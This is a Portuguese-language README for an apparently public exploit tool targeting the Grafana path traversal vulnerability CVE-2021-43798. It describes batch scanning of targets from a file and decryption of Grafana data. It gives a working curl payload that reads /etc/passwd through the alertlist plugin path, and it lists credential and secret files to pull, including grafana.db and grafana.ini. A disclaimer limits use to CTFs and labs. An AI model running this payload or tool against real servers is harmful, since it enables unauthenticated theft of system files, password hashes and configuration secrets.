
📂 Grafana LFI Exploit (CVE-2021-43798). Extração automatizada de credenciais e configuração. 🕵️
🚀 Exploit LFI do Grafana (CVE-2021-43798)
Script de automação em Python 3 para explorar a vulnerabilidade de Local File Inclusion (LFI) no Grafana (versões de 8.0.0 a 8.3.0). Este exploit permite realizar um directory traversal para ler arquivos sensíveis do sistema operacional sem autenticação. ✨ Características
Compatibilidade Python 3.10+: Corrigido para funcionar com versões modernas do Python (correção de collections.Mapping).
Varredura em Lote: Capacidade de processar múltiplos alvos através de um arquivo targets.txt.
Descriptografia de Dados: Inclui módulos para manipulação de sessões e dados criptografados do Grafana.
Otimizado para CTF: Saída limpa e direta, ideal para laboratórios como HackTheBox e TryHackMe.
🛠️ Requisitos e Instalação
Devido às dependências de bibliotecas antigas, recomenda-se instalar os seguintes pacotes: Bash
pip3 install PyInquirer termcolor requests pycryptodome --break-system-packages
Nota: Se você usa Python 3.10 ou superior, o script inclui um patch automático para compatibilidade com collections.abc.
🚀 Uso
Configurar alvos: Adicione as URLs (com porta) no arquivo targets.txt.
Bash
echo "http://10.129.234.47:3000" > targets.txt
Executar o exploit:
Bash
python3 exploit.py
🎯 Alvos comuns de leitura (LFI)
Uma vez executado, você pode tentar ler arquivos críticos como:
/etc/passwd (Usuários do sistema)
/var/lib/grafana/grafana.db (Banco de dados com hashes de usuários)
/etc/grafana/grafana.ini (Configuração e segredos)
💡 Método Alternativo (Manual)
Se preferir não usar o script, você pode explorar o LFI diretamente via curl: Bash
curl --path-as-is "http://<TARGET_IP>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
⚠️ Aviso Legal
Este repositório foi criado com fins exclusivamente educacionais e para uso em ambientes controlados (CTFs, laboratórios). O autor não se responsabiliza pelo mau uso desta ferramenta. 🏷️ Tópicos (Tags)
grafana, cve-2021-43798, lfi, exploit, pentesting, hackthebox, python3, directory-traversal